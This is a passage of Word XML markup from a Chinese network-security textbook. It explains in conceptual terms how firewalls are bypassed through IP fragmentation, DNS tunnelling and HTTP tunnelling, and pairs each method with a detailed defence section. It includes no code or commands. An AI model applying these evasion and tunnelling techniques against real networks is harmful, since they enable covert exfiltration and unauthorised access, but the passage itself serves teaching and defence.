      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">层叠防御与检测</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：在递归解析器前端部署异常检测，监控源</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">IP、目的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> IP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">分布及查询类型一致性；结合威胁情报过滤已知恶意</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DNS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">响应</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">IP。异常大量相同查询与异常的响应比例可能预示正在进行的投毒尝试（详见第</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 5 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">卷</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">第19</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">章入侵检测系统）。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">强制启用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> DNSSEC </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">验证并监控故障</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：确保所有内部客户端使用的递归解析器均启用验证；对验证失败率异常升高的域进行排查，可能为投毒攻击触发。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="134"/>
    <w:bookmarkStart w:id="139" w:name="防火墙绕过概念示意③"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">防火墙绕过概念（示意③）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">防火墙绕过并非单一攻击，而是对“边界访问控制策略”的违反。典型的思路包括利用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> IP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">层分片来让某些包过滤规则失效，或者将协议封装在允许通过的应用协议（如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">DNS、HTTP）中，建立隐蔽隧道。以下以概念层面阐述，不指导任何具体工具的使用。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="135" w:name="ip-分片绕过"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">IP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">分片绕过</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">IP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">分片原本是为适应不同</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> MTU </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">链路设计的机制。攻击者可构造特殊的分片报文，让防火墙只检查第一个分片包含的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> TCP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">或</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> UDP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">头部信息，而将关键的攻击载荷放在后续分片中。早期包过滤防火墙由于只在第一个分片执行策略检查而放行后续分片，导致攻击者可以通过分片重写源端口或偏移量，绕过基于端口/协议的限制，与内部不允许访问的端口通信。现代有状态防火墙通常会对分片进行重组后再执行策略，从而消除这一威胁，但资源受限设备和配置错误的环境中分片绕过仍有重现的可能。这一概念重点揭示了“仅首分片包含传输层头部”的缺陷，以及必须执行完整重组才能准确匹配策略的防御原则。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="135"/>
    <w:bookmarkStart w:id="136" w:name="dns-隧道"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">DNS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">隧道</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">DNS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">隧道利用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DNS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">协议在大多数网络中被允许出站这一现实，将任意数据（如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> C2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">指令、窃取的数据）编码到</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DNS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">查询和应答的负载字段（例如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> TXT、NULL、CNAME </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">等记录类型）。攻击者通常在内部受控机器上运行隧道客户端，将需要发送的数据编码到域名前缀，向外部由攻击者控制的权威域名服务器发起递归查询，查询最终到达攻击者控制的服务器，然后服务器将响应数据编码在应答中返回。由于</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DNS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">流量很少被深度检测，且大部分安全策略仅监控</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">HTTP/HTTPS，隧道可以长期存活。从协议角度看，它并未违反</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DNS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">协议本身的规范——DNS</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">天然支持任意类型记录和域名中的任意字符——而是滥用了网络的默认信任状态和监控盲区。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="136"/>
    <w:bookmarkStart w:id="137" w:name="http-隧道与封装"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">HTTP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">隧道与封装</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">类似地，HTTP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">隧道将非</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> HTTP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">流量（如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">ssh、SOCKS）封装在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> HTTP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">请求/响应的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> payload </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">中，伪装成正常的网页浏览。典型实现有</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> HTTP CONNECT </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">代理隧道、WebSocket</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">隧道及自定义的基于</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> HTTP session </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的双向通信。对于仅检查端口和协议关键字的防火墙，HTTP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">隧道看起来同普通</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Web </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">流量无异，难以阻断。深度包检测（DPI）和</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> TLS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">中间审查等机制可揭示隧道行为，但也带来了性能与隐私成本的平衡。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="137"/>
    <w:bookmarkStart w:id="138" w:name="其他概念性绕过途径"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">其他概念性绕过途径</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1078"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">分段、重叠分片（teardrop</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">类的资源耗尽）、使用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> IPv6 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">扩展头绕过</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> IPv4 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">专用策略。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1078"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">利用防火墙仅检查</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> TCP SYN </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">包建立状态，而在已建立连接中注入恶意数据（如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> FTP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">数据通道）。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1078"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">利用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> NAT </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的多重映射或</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ALG </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">缺陷打开意外通路。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">本节强调所有这些绕过方法都是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">概念示意③</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">，不会提供具体的工具配置或实际绕过步骤。其核心教育意义在于：不能依赖单点的“默认允许”策略，必须建立纵深防御模型。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">防御对照框：防火墙绕过的蓝队应对</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">默认拒绝与最小权限策略</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：防火墙入站和出站规则均应采用白名单方式，仅允许业务必需的协议、端口和</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> IP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">范围。入站默认拒绝所有，出站同样默认拒绝，逐步根据需求开放。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">执行状态检测与分片重组</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：启用有状态防火墙（stateful</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">inspection），强制所有分片重组后才能通过策略，阻断孤立的非首分片报文。检查设备配置中是否有“fragment</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">reassembly”选项。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">启用应用层检测（DPI/IPS）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：在出口部署网络入侵防御系统（NIPS/IPS）对</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DNS、HTTP、TLS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">等流量进行协议异常和内容签名检测，识别</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DNS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">隧道（高熵域名、长域名、不常见的记录类型）和</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> HTTP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">隧道（周期性心跳、异常</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> User-Agent </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">等）。参考</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> MITRE ATT&amp;CK </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">框架中命令与控制（C2）相关的技术指标（T1090、T1071），前指卷五</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Snort/Suricata </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的配置。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">出站</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> DNS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">管控</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：所有内部客户端必须使用自己的本地递归解析器，解析器对外仅允许向白名单权威服务器发起查询，禁止直接与外部公共</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DNS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">通信；同时监控解析器的异常出站流量模式，例如大量</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> TXT </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">查询或域名长度分布异常。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">纵深防御与微分段</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：即使边界防火墙被绕过，内部网段之间的东西向流量仍应受到主机防火墙和微分段策略的限制，减少横向移动的可能。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">日志与异常检测</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：将防火墙</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> deny </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">日志、DNS</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">查询日志、代理日志汇聚到</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">SIEM，建立基线并检测突发的长连接、大量未知域名查询、分片丢包异常等行为。可参考</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> NIST SP 800-41 Rev. 1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">等防火强安全指南及</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Bejtlich </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">在《The</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Practice of Network Security </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Monitoring》中关于网络取证与检测的方法。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="138"/>
    <w:bookmarkEnd w:id="139"/>
    <w:bookmarkStart w:id="140" w:name="回顾-dns-与防火墙安全的整体思考"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">回顾</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DNS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">与防火墙安全的整体思考</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">DNS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">缓存投毒与防火墙绕过虽然分属应用层和网络层，但都利用了防御者对底层基础设施的“过度信任”。DNS</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">投毒利用了</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DNS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">查询的无认证特性，防火墙绕过则利用协议栈灵活性绕过策略执行点。两者的有效防御都遵循同一原则：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">从不信任未经验证的输入，对每一层实施独立的认证与控制</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">。DNSSEC </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">为</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DNS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">提供了端到端的加密验证，而出站默认禁止与深度包检测则为防火墙的边界防护增添了应用层洞察。这一原则与前面</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> VLAN </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">跳跃及</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DHCP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">攻击防御中强调的“禁用默认信任、强制最小特权”一以贯之，构成了协议安全加固的通用基线。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="140"/>
    <w:bookmarkStart w:id="142" w:name="习题-8"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">习题</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1079"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">提取题</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：DNS</w:t>
      </w:r>
      <w:r>
